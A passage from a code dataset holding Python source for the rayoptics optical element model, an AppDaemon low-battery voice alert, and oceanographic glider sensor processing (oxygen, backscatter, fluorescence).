handles: dict of graphical entities\n actions: dict of actions associated with the graphical handles\n \"\"\"\n clut = rgbt.RGBTable(filename='red_blue64.csv',\n data_range=[10.0, 100.])\n\n label_format = 'CE{}'\n serial_number = 0\n\n def __init__(self, ifc_list, label=None):\n if label is None:\n CementedElement.serial_number += 1\n self.label = CementedElement.label_format.format(\n CementedElement.serial_number)\n else:\n self.label = label\n\n g_tfrm = ifc_list[0][4]\n if g_tfrm is not None:\n self.tfrm = g_tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n self.idxs = []\n self.ifcs = []\n self.gaps = []\n self.medium_name = ''\n for interface in ifc_list:\n i, ifc, g, z_dir, g_tfrm = interface\n self.idxs.append(i)\n self.ifcs.append(ifc)\n if g is not None:\n self.gaps.append(g)\n if self.medium_name != '':\n self.medium_name += ', '\n self.medium_name += g.medium.name()\n\n if len(self.gaps) == len(self.ifcs):\n self.gaps.pop()\n self.medium_name = self.medium_name.rpartition(',')[0]\n\n self._sd = self.update_size()\n self.flats = [None]*len(self.ifcs)\n\n self.handles = {}\n self.actions = {}\n\n @property\n def sd(self):\n \"\"\"Semi-diameter \"\"\"\n return self._sd\n\n @sd.setter\n def sd(self, semidiam):\n self._sd = semidiam\n self.edge_extent = (-semidiam, semidiam)\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['ifcs']\n del attrs['gaps']\n del attrs['flats']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n fmt = 'CementedElement: {}'\n return fmt.format(self.idxs)\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n # when restoring, we want to use the stored indices to look up the\n # new object instances\n self.parent = ele_model\n self.ifcs = [surfs[i] for i in self.idxs]\n self.gaps = [gaps[i] for i in self.idxs[:-1]]\n self.tfrm = tfrms[self.idxs[0]]\n self.flats = [None]*len(self.ifcs)\n if not hasattr(self, 'medium_name'):\n self.medium_name = self.gap.medium.name()\n\n def sync_to_update(self, seq_model):\n # when updating, we want to use the stored object instances to get the\n # current indices into the interface list (e.g. to handle insertion and\n # deletion of interfaces)\n self.idxs = [seq_model.ifcs.index(ifc) for ifc in self.ifcs]\n\n def element_list(self):\n idxs = self.idxs\n ifcs = self.ifcs\n gaps = self.gaps\n e_list = []\n for i in range(len(gaps)):\n e = Element(ifcs[i], ifcs[i+1], gaps[i],\n sd=self.sd, tfrm=self.tfrm,\n idx=idxs[i], idx2=idxs[i+1])\n e_list.append(e)\n\n def tree(self, **kwargs):\n default_tag = '#element#cemented'\n tag = default_tag + kwargs.get('tag', '')\n zdir = kwargs.get('z_dir', 1)\n ce = Node('CE', id=self, tag=tag)\n for i, sg in enumerate(itertools.zip_longest(self.ifcs, self.gaps),\n start=1):\n ifc, gap = sg\n pid = f'p{i}'.format(i)\n p = Node(pid, id=ifc.profile, tag='#profile', parent=ce)\n Node(f'i{self.idxs[i-1]}', id=ifc, tag='#ifc', parent=p)\n # Gap branch\n if gap is not None:\n t = Node(f't{i}', id=gap, tag='#thic', parent=ce)\n Node(f'g{self.idxs[i-1]}', id=(gap, zdir),\n tag='#gap', parent=t)\n\n return ce\n\n def reference_interface(self):\n return self.ifcs[0]\n\n def reference_idx(self):\n return self.idxs[0]\n\n def interface_list(self):\n return self.ifcs\n\n def gap_list(self):\n return self.gaps\n\n def update_size(self):\n extents = np.union1d(self.ifcs[0].get_y_aperture_extent(),\n self.ifcs[-1].get_y_aperture_extent())\n self.edge_extent = (extents[0], extents[-1])\n self.sd = max([ifc.surface_od() for ifc in self.ifcs])\n return self.sd\n\n def compute_flat(self, s):\n ca = s.surface_od()\n if (1.0 - ca/self.sd) >= 0.05:\n flat = ca\n else:\n flat = None\n return flat\n\n def extent(self):\n if hasattr(self, 'edge_extent'):\n return self.edge_extent\n else:\n return (-self.sd, self.sd)\n\n def render_shape(self):\n if self.ifcs[0].profile_cv < 0.0:\n self.flats[0] = self.compute_flat(self.ifcs[0])\n else:\n self.flats[0] = None\n if self.ifcs[-1].profile_cv > 0.0:\n self.flats[-1] = self.compute_flat(self.ifcs[-1])\n else:\n self.flats[-1] = None\n\n # generate the profile polylines\n self.profiles = []\n sense = 1\n for ifc, flat in zip(self.ifcs, self.flats):\n poly = ifc.full_profile(self.extent(), flat, sense)\n self.profiles.append(poly)\n sense = -sense\n\n # offset the profiles wrt the element origin\n thi = 0\n for i, poly_profile in enumerate(self.profiles[1:]):\n thi += self.gaps[i].thi\n for p in poly_profile:\n p[0] += thi\n\n # just return outline\n poly_shape = []\n poly_shape += self.profiles[0]\n poly_shape += self.profiles[-1]\n poly_shape.append(poly_shape[0])\n\n return poly_shape\n\n def render_handles(self, opt_model):\n self.handles = {}\n\n shape = self.render_shape()\n # self.handles['shape'] = GraphicsHandle(shape, self.tfrm, 'polygon')\n\n for i, gap in enumerate(self.gaps):\n poly = []\n poly += self.profiles[i]\n poly += self.profiles[i+1]\n poly.append(self.profiles[i][0])\n color = calc_render_color_for_material(gap.medium)\n self.handles['shape'+str(i+1)] = GraphicsHandle(poly, self.tfrm,\n 'polygon', color)\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n\n return self.actions\n\n\nclass ThinElement():\n\n label_format = 'TL{}'\n serial_number = 0\n\n def __init__(self, ifc, tfrm=None, idx=0, sd=None, label=None):\n if label is None:\n ThinElement.serial_number += 1\n self.label = ThinElement.label_format.format(\n ThinElement.serial_number)\n else:\n self.label = label\n\n self.render_color = (192, 192, 192)\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n self.intrfc = ifc\n self.intrfc_indx = idx\n self.medium_name = 'Thin Element'\n if sd is not None:\n self.sd = sd\n else:\n self.sd = ifc.max_aperture\n self.handles = {}\n self.actions = {}\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['intrfc']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n return str(self.intrfc)\n\n def tree(self, **kwargs):\n default_tag = '#element#thinlens'\n tag = default_tag + kwargs.get('tag', '')\n tle = Node('TL', id=self, tag=tag)\n Node('tl', id=self.intrfc, tag='#ifc', parent=tle)\n return tle\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n self.parent = ele_model\n self.tfrm = tfrms[self.intrfc_indx]\n self.intrfc = surfs[self.intrfc_indx]\n if not hasattr(self, 'medium_name'):\n self.medium_name = 'Thin Element'\n\n ro_version = ele_model.opt_model.ro_version\n if version.parse(ro_version) < version.parse(\"0.7.0a\"):\n ThinElement.serial_number += 1\n self.label = ThinElement.label_format.format(ThinElement.serial_number)\n\n def sync_to_update(self, seq_model):\n self.intrfc_indx = seq_model.ifcs.index(self.intrfc)\n\n def reference_interface(self):\n return self.intrfc\n\n def reference_idx(self):\n return self.intrfc_indx\n\n def interface_list(self):\n return [self.intrfc]\n\n def gap_list(self):\n return []\n\n def update_size(self):\n self.sd = self.intrfc.surface_od()\n return self.sd\n\n def render_shape(self):\n poly = self.intrfc.full_profile((-self.sd, self.sd))\n return poly\n\n def render_handles(self, opt_model):\n self.handles = {}\n shape = self.render_shape()\n self.handles['shape'] = GraphicsHandle(shape, self.tfrm, 'polygon',\n self.render_color)\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n return self.actions\n\nclass DummyInterface():\n\n label_format = 'D{}'\n serial_number = 0\n\n def __init__(self, ifc, idx=0, sd=None, tfrm=None, label=None):\n if label is None:\n DummyInterface.serial_number += 1\n self.label = DummyInterface.label_format.format(\n DummyInterface.serial_number)\n else:\n self.label = label\n\n self.render_color = (192, 192, 192)\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n self.ref_ifc = ifc\n self.idx = idx\n self.medium_name = 'Interface'\n if sd is not None:\n self.sd = sd\n else:\n self.sd = ifc.max_aperture\n self.handles = {}\n self.actions = {}\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['ref_ifc']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n return str(self.ref_ifc)\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n self.parent = ele_model\n self.tfrm = tfrms[self.idx]\n self.ref_ifc = surfs[self.idx]\n if not hasattr(self, 'medium_name'):\n self.medium_name = 'Interface'\n\n def sync_to_update(self, seq_model):\n self.idx = seq_model.ifcs.index(self.ref_ifc)\n\n def tree(self, **kwargs):\n default_tag = '#dummyifc'\n tag = default_tag + kwargs.get('tag', '')\n di = Node('DI', id=self, tag=tag)\n p = Node('p', id=self.ref_ifc.profile, tag='#profile', parent=di)\n Node(f'i{self.idx}', id=self.ref_ifc, tag='#ifc', parent=p)\n return di\n\n def reference_interface(self):\n return self.ref_ifc\n\n def reference_idx(self):\n return self.idx\n\n def interface_list(self):\n return [self.ref_ifc]\n\n def gap_list(self):\n return []\n\n def update_size(self):\n self.sd = self.ref_ifc.surface_od()\n return self.sd\n\n def render_shape(self):\n poly = self.ref_ifc.full_profile((-self.sd, self.sd))\n return poly\n\n def render_handles(self, opt_model):\n self.handles = {}\n\n self.handles['shape'] = GraphicsHandle(self.render_shape(), self.tfrm,\n 'polyline')\n\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n\n def get_adj_spaces():\n seq_model = self.parent.opt_model.seq_model\n if self.idx > 0:\n before = seq_model.gaps[self.idx-1].thi\n else:\n before = None\n if self.idx < seq_model.get_num_surfaces() - 1:\n after = seq_model.gaps[self.idx].thi\n else:\n after = None\n return (before, after)\n\n def set_adj_spaces(cur_value, change):\n seq_model = self.parent.opt_model.seq_model\n if cur_value[0] is not None:\n seq_model.gaps[self.idx-1].thi = cur_value[0] + change\n if cur_value[1] is not None:\n seq_model.gaps[self.idx].thi = cur_value[1] - change\n\n slide_action = {}\n slide_action['x'] = Action(get_adj_spaces, set_adj_spaces)\n self.actions['shape'] = slide_action\n\n return self.actions\n\n\nclass AirGap():\n\n label_format = 'AG{}'\n serial_number = 0\n\n def __init__(self, g, idx=0, tfrm=None, label=None):\n if label is None:\n AirGap.serial_number += 1\n self.label = AirGap.label_format.format(AirGap.serial_number)\n else:\n self.label = label\n\n if tfrm is not None:\n self.tfrm = tfrm\n else:\n self.tfrm = (np.identity(3), np.array([0., 0., 0.]))\n\n self.render_color = (237, 243, 254, 64) # light blue\n self.gap = g\n self.medium_name = self.gap.medium.name()\n self.idx = idx\n self.handles = {}\n self.actions = {}\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['parent']\n del attrs['tfrm']\n del attrs['gap']\n del attrs['handles']\n del attrs['actions']\n return attrs\n\n def __str__(self):\n return str(self.gap)\n\n def sync_to_restore(self, ele_model, surfs, gaps, tfrms):\n self.parent = ele_model\n self.gap = gaps[self.idx]\n self.tfrm = tfrms[self.idx]\n if not hasattr(self, 'render_color'):\n self.render_color = (237, 243, 254, 64) # light blue\n if not hasattr(self, 'medium_name'):\n self.medium_name = self.gap.medium.name()\n\n ro_version = ele_model.opt_model.ro_version\n if version.parse(ro_version) < version.parse(\"0.7.0a\"):\n AirGap.serial_number += 1\n self.label = AirGap.label_format.format(AirGap.serial_number)\n\n def sync_to_update(self, seq_model):\n self.idx = seq_model.gaps.index(self.gap)\n\n def tree(self, **kwargs):\n default_tag = '#airgap'\n tag = default_tag + kwargs.get('tag', '')\n ag = Node('AG', id=self, tag=tag)\n t = Node('t', id=self.gap, tag='#thic', parent=ag)\n zdir = kwargs.get('z_dir', 1)\n Node(f'g{self.idx}', id=(self.gap, zdir), tag='#gap', parent=t)\n return ag\n\n def reference_interface(self):\n return None\n\n def reference_idx(self):\n return self.idx\n\n def interface_list(self):\n return []\n\n def gap_list(self):\n return [self.gap]\n\n def update_size(self):\n pass\n\n def render_handles(self, opt_model):\n self.handles = {}\n\n poly_ct = []\n poly_ct.append([0., 0.])\n poly_ct.append([self.gap.thi, 0.])\n\n # Modify the tfrm to account for any decenters following\n # the reference ifc.\n tfrm = self.tfrm\n decenter = opt_model.seq_model.ifcs[self.idx].decenter\n if decenter is not None:\n r_global, t_global = tfrm\n r_after_ifc, t_after_ifc = decenter.tform_after_surf()\n t = r_global.dot(t_after_ifc) + t_global\n r = r_global if r_after_ifc is None else r_global.dot(r_after_ifc)\n tfrm = r, t\n\n self.handles['ct'] = GraphicsHandle(poly_ct, tfrm, 'polyline')\n\n return self.handles\n\n def handle_actions(self):\n self.actions = {}\n\n ct_action = {}\n ct_action['x'] = AttrAction(self.gap, 'thi')\n self.actions['ct'] = ct_action\n\n return self.actions\n\n\n# --- Element model\nclass ElementModel:\n \"\"\"Maintain the element based representation of the optical model\n\n Attributes:\n opt_model: the :class:`~rayoptics.optical.opticalmodel.OpticalModel`\n elements: list of element type things\n\n \"\"\"\n\n def __init__(self, opt_model, **kwargs):\n self.opt_model = opt_model\n self.elements = []\n\n def reset(self):\n self.__init__(self.opt_model)\n\n def __json_encode__(self):\n attrs = dict(vars(self))\n del attrs['opt_model']\n return attrs\n\n def sync_to_restore(self, opt_model):\n self.opt_model = opt_model\n seq_model = opt_model.seq_model\n surfs = seq_model.ifcs\n gaps = seq_model.gaps\n tfrms = seq_model.compute_global_coords(1)\n\n # special processing for older models\n # self.airgaps_from_sequence(seq_model, tfrms)\n # self.add_dummy_interface_at_image(seq_model, tfrms)\n\n self.reset_serial_numbers()\n for i, e in enumerate(self.elements, start=1):\n e.sync_to_restore(self, surfs, gaps, tfrms)\n if not hasattr(e, 'label'):\n e.label = e.label_format.format(i)\n self.sequence_elements()\n # self.relabel_airgaps()\n\n def reset_serial_numbers(self):\n Element.serial_number = 0\n Mirror.serial_number = 0\n CementedElement.serial_number = 0\n ThinElement.serial_number = 0\n DummyInterface.serial_number = 0\n AirGap.serial_number = 0\n\n def airgaps_from_sequence(self, seq_model, tfrms):\n \"\"\" add airgaps and dummy interfaces to an older version model \"\"\"\n for e in self.elements:\n if isinstance(e, AirGap):\n return # found an AirGap, model probably OK\n\n num_elements = 0\n seq_model = self.opt_model.seq_model\n for i, g in enumerate(seq_model.gaps):\n if g.medium.name().lower() == 'air':\n if i > 0:\n s = seq_model.ifcs[i]\n tfrm = tfrms[i]\n num_elements = self.process_airgap(\n seq_model, i, g, s, tfrm,\n num_elements, add_ele=False)\n\n def add_dummy_interface_at_image(self, seq_model, tfrms):\n if len(self.elements) and self.elements[-1].label == 'Image':\n return\n\n s = seq_model.ifcs[-1]\n idx = seq_model.get_num_surfaces() - 1\n di = DummyInterface(s, sd=s.surface_od(), tfrm=tfrms[-1], idx=idx,\n label='Image')\n self.opt_model.part_tree.add_element_to_tree(di, tag='#image')\n self.add_element(di)\n\n def update_model(self, **kwargs):\n seq_model = self.opt_model['seq_model']\n tfrms = seq_model.compute_global_coords(1)\n\n # dynamically build element list from part_tree\n part_tree = self.opt_model['part_tree']\n nodes = part_tree.nodes_with_tag(tag='#element#airgap#dummyifc')\n elements = [n.id for n in nodes]\n\n # hook or unhook elements from ele_model\n cur_set = set(self.elements)\n new_set = set(elements)\n added_ele = list(new_set.difference(cur_set))\n for e in added_ele:\n e.parent = self\n removed_ele = list(cur_set.difference(new_set))\n for e in removed_ele:\n e.parent = None\n\n # update the elements\n for e in elements:\n e.update_size()\n e.sync_to_update(seq_model)\n e.tfrm = tfrms[e.reference_idx()]\n\n self.elements = elements\n self.sequence_elements()\n\n def sequence_elements(self):\n \"\"\" Sort elements in order of reference interfaces in seq_model \"\"\"\n seq_model = self.opt_model.seq_model\n\n # sort by element reference interface sequential index\n self.elements.sort(key=lambda e: e.reference_idx())\n\n # Make sure z_dir matches the sequential model. Used to get\n # the correct substrate offset.\n if hasattr(seq_model, 'z_dir'):\n for e in self.elements:\n if hasattr(e, 'z_dir'):\n e.z_dir = seq_model.z_dir[e.reference_idx()]\n\n def relabel_airgaps(self):\n for i, e in enumerate(self.elements):\n if isinstance(e, AirGap):\n eb = self.elements[i-1].label\n ea = self.elements[i+1].label\n e.label = AirGap.label_format.format(eb + '-' + ea)\n\n def add_element(self, e):\n e.parent = self\n self.elements.append(e)\n\n def remove_element(self, e):\n e.parent = None\n self.elements.remove(e)\n\n def remove_node(self, e_node):\n part_tree = self.opt_model.part_tree\n nodes = part_tree.nodes_with_tag(tag='#element#airgap#dummyifc',\n root=e_node)\n eles = [n.id for n in nodes]\n for e in eles:\n self.remove_element(e)\n\n def get_num_elements(self):\n return len(self.elements)\n\n def list_model(self, tag='#element#dummyifc'):\n nodes = self.opt_model.part_tree.nodes_with_tag(tag=tag)\n elements = [n.id for n in nodes]\n for i, ele in enumerate(elements):\n print(\"%d: %s (%s): %s\" %\n (i, ele.label, type(ele).__name__, ele))\n\n def list_elements(self):\n for i, ele in enumerate(self.elements):\n print(\"%d: %s (%s): %s\" %\n (i, ele.label, type(ele).__name__, ele))\n\n def element_type(self, i):\n return type(self.elements[i]).__name__\n","sub_path":"src/rayoptics/elem/elements.py","file_name":"elements.py","file_ext":"py","file_size_in_byte":44674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"547655100","text":"from base import Base\r\nfrom globals import PEOPLE, presence_state\r\nfrom typing import Tuple, Union\r\n\"\"\"\r\nClass LowBatteryManager manages the low battery warning TTS \r\n\r\n\r\n\"\"\"\r\nclass LowBatteryManager(Base):\r\n\r\n def initialize(self) -> None:\r\n \"\"\"Initialize.\"\"\"\r\n super().initialize() # Always call base class\r\n\r\n self._people = self.args.get(\"people\", {})\r\n self._low_bat_level = int(self.args.get(\"battery_level_low\", \"15\"))\r\n self._tts_device = self.args.get(\"tts_device\", \"media_player.house\")\r\n\r\n for person in self._people:\r\n self.log(\"Setup tracker {}\".format(PEOPLE[person]['device_tracker']))\r\n self.listen_state(\r\n self.__on_tracker_changed, \r\n entity=PEOPLE[person]['device_tracker'],\r\n attribute=\"all\",\r\n person=person\r\n )\r\n\r\n def __on_tracker_changed(\r\n self, entity: Union[str, dict], attribute: str, old: dict,\r\n new: dict, kwargs: dict) -> None:\r\n\r\n if old is None:\r\n return\r\n\r\n person = kwargs['person']\r\n batt_level = int(new[\"attributes\"].get(\"battery_level\", \"100\"))\r\n old_bat_lev = int(old[\"attributes\"].get(\"battery_level\", \"100\"))\r\n state = new[\"state\"]\r\n \r\n if batt_level != old_bat_lev and self.now_is_between(\"07:00:00\", \"22:30:00\"):\r\n self.log(\"{} changed battery status from {} to {}\".format(entity, old_bat_lev, batt_level))\r\n\r\n if old_bat_lev > self._low_bat_level and \\\r\n batt_level<=self._low_bat_level and \\\r\n state==presence_state[\"home\"] and \\\r\n self.now_is_between(\"07:00:00\", \"22:30:00\"):\r\n # Battery level went from over min level to under min level and the person is home, lets warn!\r\n self.tts_manager.speak(\"{}, dags att ladda din mobil. {} ladda din mobil nu!\".format(person, person), media_player=self._tts_device)","sub_path":"appdaemon/apps/presence/low_battery.py","file_name":"low_battery.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"488896902","text":"#!/usr/bin/env python\nfrom __future__ import (print_function as _pf,\n unicode_literals as _ul,\n absolute_import as _ai)\n\n\ndef calc_physics(variable, dives, depth,\n spike_window=3, spike_method='minmax',\n iqr=1.5,\n savitzky_golay_window=11, savitzky_golay_order=2,\n verbose=True, name='Physics Variable'):\n \"\"\"\n This function is a standard setup for processing physics\n variables (temperature and salinity).\n\n The function applies a neighbourhood interquartile range (IQR)\n outlier filter, the Briggs et al. (2011) spike filter\n followed by a Savitzky-Golay smoothing function.\n\n For more information about the neighbourhood IQR outlier filter\n see the docs for buoyancy_glider_utils.tools.neighbourhood_iqr.\n\n The Savitzky-Golay filter is demonstrated well on wikipedia:\n https://en.wikipedia.org/wiki/Savitzky-Golay_filter\n \"\"\"\n\n from pandas import Series\n from numpy import array, ma, NaN, inf\n from .cleaning import savitzky_golay, despike, outlier_bounds_iqr\n from . import optics as op\n\n x = array(dives)\n y = array(depth)\n\n # an interpolation step is added so that no nans are created.\n # Note that this interpolates on the flattened series\n if isinstance(variable, Series):\n name = variable.name\n\n if verbose:\n print('\\n' + '=' * 50 + \"\\n{}:\".format(name))\n\n if iqr:\n ll, ul = outlier_bounds_iqr(variable, multiplier=iqr)\n mask = (variable < ll) | (variable > ul)\n z = variable.where(~mask)\n if verbose:\n print(' Removing outliers with IQR * {}: {} obs'.format(iqr, mask.sum()))\n\n if spike_window:\n b, s = despike(z, spike_window, spike_method)\n z = b\n if verbose:\n print(\n \" Removing spikes with rolling median (spike window={})\"\n \"\".format(spike_window))\n\n if savitzky_golay_window:\n if verbose:\n print(\" Smoothing with Savitzky-Golay filter (window={}, order={})\".format(savitzky_golay_window, savitzky_golay_order))\n z = savitzky_golay(z, savitzky_golay_window, savitzky_golay_order)\n\n return Series(z, name=name)\n\n\ndef calc_oxygen(o2raw, pressure, salinity, temperature, conversion='auto',\n spike_window=7, spike_method='median',\n savitzky_golay_window=0, savitzky_golay_order=2,\n verbose=True):\n \"\"\"\n This function processes oxygen. It is assumed that either\n mL/L or umol/kg are passed as input. The units are automatically\n detected by looking at the mean ratio\n Below are some conversions to help with the Oxygen units\n µmol/l > µmol/kg * 1.025\n µmol/l > ml/l * 44.66\n µmol/l > mg/l * 31.25\n \"\"\"\n\n from sklearn.linear_model import LinearRegression\n from numpy import isnan, abs, array, ones, c_, median\n from . cleaning import outlier_bounds_iqr, despike, savitzky_golay\n import seawater as sw\n from pandas import Series\n\n if isinstance(o2raw, Series):\n name = o2raw.name\n else:\n name = 'Oxygen'\n\n if spike_window:\n o2raw, _ = despike(o2raw, spike_window, spike_method)\n if verbose:\n print(\n '\\n' + '=' * 50 + \"\\n{}:\\n\"\n \"\\tSmoothing data with despiking algorithm:\\n\\t\"\n \" spike identification (spike window={})\"\n \"\".format(name, spike_window))\n\n if savitzky_golay_window:\n if verbose:\n print(\"\\tSmoothing with Savitzky-Golay filter (window={}, order={})\".format(savitzky_golay_window, savitzky_golay_order))\n o2raw = savitzky_golay(o2raw, savitzky_golay_window, savitzky_golay_order)\n\n o2sat = sw.satO2(salinity, temperature)\n density = sw.dens(salinity, temperature, pressure)\n\n if conversion == 'auto':\n # use linear regression to determine the oxygen unit\n # raw surface (<10m) O2 is regressed theoretical saturation\n # the slope of the regression will be indicative of the\n # units as theoretical saturation is always in mL/L\n # Use the min difference between the slope and known\n # conversion factors to estimate the appropriate conversion.\n\n # clean the data first with basic cleaning\n surf = ((pressure < 20) & ~isnan(o2raw) & ~isnan(o2sat))\n # prepare the data for linear regression\n Y = o2raw[surf].copy()\n X = c_[ones(surf.sum()), o2sat[surf]]\n # removing outliers accodring to IQR\n ll, ul = outlier_bounds_iqr(Y, multiplier=1.5)\n m = (Y > ll) & (Y < ul)\n ratios = Y[m] / X[m, 1]\n\n # compare the slopes\n observed_ratio = median(ratios)\n # the theoretical values have been divided by 1.025 to account for\n # the density of seawater\n theoretic_ratio = array([1, 43.5])\n ratio_diffs = abs(observed_ratio - theoretic_ratio)\n # catch if the difference is too big\n if ratio_diffs.min() > 10:\n print('Oxygen unit could not be estimated automatically. '\n 'Do the unit conversion on the raw data before '\n 'passing it to the function. \\n'\n 'Below is some info to help you\\n'\n ' µmol/l > µmol/kg * 1.025\\n'\n ' µmol/l > ml/l * 44.66\\n'\n ' µmol/l > mg/l * 31.25')\n # otherwise do the conversion\n else:\n unit_idx = ratio_diffs.argmin()\n if unit_idx == 0:\n unit = 'mL/L'\n o2mll = array(o2raw)\n elif unit_idx == 2:\n unit = 'mg/L'\n o2mll = array(o2raw) / 31.25 * (density / 1000)\n elif unit_idx == 1:\n unit = 'umol/kg'\n o2mll = array(o2raw) / 44.66 * (density / 1000)\n else:\n print('Difference is {}'.format(ratio_diffs))\n print('\\tUnits automatically detected {}'.format(unit))\n if ratio_diffs.min() > 5:\n print('\\tWARNING: Confirm units mannually as near the confidence threshold')\n o2aou = o2sat - o2mll\n o2pct = o2mll / o2sat * 100\n return o2mll, o2pct, o2aou\n\n else:\n print(\n \"No oxygen conversion applied - user \"\n \"must impliment before or after running \"\n \"the cleaning functions.\")\n\n\ndef calc_backscatter(bb_raw, wavelength, tempC, salt, dives, depth,\n dark_count, scale_factor, deep_method='median', iqr=3,\n profiles_ref_depth=300, deep_multiplier=1,\n spike_window=7, spike_method='median',\n return_figure=False, verbose=True):\n \"\"\"\n INORMATION\n ----------\n Process the raw backscattering data from channel 2 at wavelength 700 nm.\n NOTE: This uses the same processing steps as calc_bb1.\n\n Use standard values for the CSIR SeaGliders to process backscatter.\n wavelength = 700nm\n theta angle of sensors = 124deg\n xfactor for theta 124 = 1.076\n This function also makes use of the flo_functions toolkit (Zhang et al. 2009)\n to calculate total backscatter.\n\n The following steps are applied in this sequence:\n 1. find_bad_profiles (high values below 300 m are counted as bad profiles)\n 2. flo_scale_and_offset (factory scale and offset)\n 3. flo_bback_total (total backscatter based on Zhang et al. 2009)\n 4. backscatter_dark_count (based on Briggs et al. 2011)\n 5. seperate_spikes (using Briggs et al. 2011 - rolling min--max)\n 6. neighbourhood_iqr (see buoyancy_glider_utils.tools.neighbourhood_iqr)\n\n INPUT\n -----\n All inputs must be ungridded np.ndarray or pd.Series data\n bb_raw raw output from backscatter 470 nm\n tempC QC'd temperature in degC\n salt QC'd salinity in PSU\n dives the dive count (round is down dives, 0.5 up dives)\n depth in metres\n\n wavelength e.g. 700 nm / 470 nm\n dark_count factory values from the cal sheet\n scale_factor factory values from the cal sheet\n spike_window the window size over which to run the despiking\n spike_method whether to use a rolling median or combination of min+max filter\n profiles_ref_depth the reference depth to determine bad profiles\n method whether to use the deep median or deep mean to determine bad profiles\n neighbour_iqr_multiplier the multiplier for the iqr\n neighbour_depth_window the depth window for the iqr\n neighbour_dives_window the dive window for the iqr\n\n return_figure return a figure object that shows the before and after\n verbose will print the progress of the processing\n\n OUTPUT\n ------\n baseline an np.ma.masked_array with the mask denoting the filtered values\n the baseline of the backscatter as defined by Briggs et al. 2011\n spikes the spikes of backscatter from Briggs et al. 2011\n fig a figure object if return_figure=True else returns None\n \"\"\"\n from numpy import array, nan, count_nonzero, unique\n from pandas import Series\n from . import optics as op\n from . import flo_functions as ff\n from .cleaning import despike, despiking_report, outlier_bounds_iqr\n\n bb_raw = Series(bb_raw.copy())\n dives = array(dives)\n depth = array(depth)\n tempC = array(tempC)\n salt = array(salt)\n name = 'bb{:.0f}'.format(wavelength)\n theta = 124 # factory set angle of optical sensors\n xfactor = 1.076 # for theta 124\n\n ref_depth = profiles_ref_depth\n stdev_multiplier = deep_multiplier\n method = deep_method\n\n dive_count = count_nonzero(unique(dives))\n\n if verbose:\n print('\\n' + '=' * 50 + \"\\n{}:\".format(name))\n\n if iqr:\n ll, ul = outlier_bounds_iqr(bb_raw, multiplier=iqr)\n mask = (bb_raw < ll) | (bb_raw > ul)\n z = bb_raw.where(~mask)\n if verbose:\n print('\\tRemoving outliers with IQR * {}: {} obs'.format(iqr, mask.sum()))\n\n if verbose:\n print('\\tMask bad profiles based on deep values (depth={}m)'.format(ref_depth))\n bad_profiles = op.find_bad_profiles(dives, depth, bb_raw, ref_depth, stdev_multiplier, method)\n bb_raw[bad_profiles[0]] = nan\n\n bad_count = count_nonzero(bad_profiles[1])\n\n if verbose:\n print('\\tNumber of bad profiles = {}/{}'.format(bad_count, dive_count))\n\n if verbose:\n print('\\tZhang et al. (2009) correction')\n beta = ff.flo_scale_and_offset(bb_raw, dark_count, scale_factor)\n bbp = ff.flo_bback_total(beta, tempC, salt, theta, wavelength, xfactor)\n\n # This is from .Briggs et al. (2011)\n if verbose:\n print('\\tDark count correction')\n bbp = op.backscatter_dark_count(bbp, depth)\n\n if verbose:\n print(\n \"\\tSpike identification (spike window={})\"\n \"\".format(spike_window))\n\n baseline, spikes = despike(bbp, spike_window, spike_method='median')\n baseline = Series(baseline, name=\"bb{:.0f}\".format(wavelength))\n\n if not return_figure:\n return baseline, spikes\n else:\n if verbose:\n print('\\tGenerating figure for despiking report')\n fig = despiking_report(dives, depth, bbp, baseline, spikes, name=name)\n\n return baseline, spikes, fig\n\n\ndef calc_fluorescence(flr_raw, bbp, dives, depth, time, lat, lon, dark_count, scale_factor,\n spike_window=7, spike_method='median',\n par=None, quenching_layer=None,\n night_day_group=True, sunrise_sunset_offset=1,\n profiles_ref_depth=300, deep_multiplier=1, deep_method='median',\n return_figure=False, verbose=True):\n \"\"\"\n INFORMATION\n -----------\n This function processes Fluorescence and corrects for quenching using\n the Thomalla et al. (2017) approach.\n\n The standard sequence is applied:\n 1. find_bad_profiles (high Fluorescence in > 300 m water signals bad profile)\n 2. fluorescence_dark_count (factory correction)\n 3. seperate_spikes (using Briggs et al. 2011 - rolling min--max)\n 4. photic_depth (find photic depth based on PAR)\n 5. quenching_correction (corrects for quenching with Thomalla et al. 2017)\n 6. neighbourhood_iqr (find the outliers based on the interquartile range)\n\n INPUT\n -----\n All inputs must be ungridded np.ndarray or pd.Series data\n flr_raw raw output from backscatter 470 nm\n bbp processed backscatter from less noisy channel\n dives the dive count (round is down dives, 0.5 up dives)\n depth in metres\n time as a np.datetime64 array\n lat, lon latitude and longitude\n\n dark_count factory values from the cal sheet\n scale_factor factory values from the cal sheet\n spike_window the window size over which to run the despiking\n spike_method whether to use a rolling median or combination of min+max filter\n par PAR is optional, if not given quenching depth search is limited to 100m\n quenching_layer user specified version of determining quenching depth\n night_day_group If True, use night after otherwise use night before for flr:bbp ratio\n sunrise_sunset_offset the delayed onset and recovery of quenching in hours [1] (assumes symmetrical)\n profiles_ref_depth the reference depth to determine bad profiles\n method whether to use the 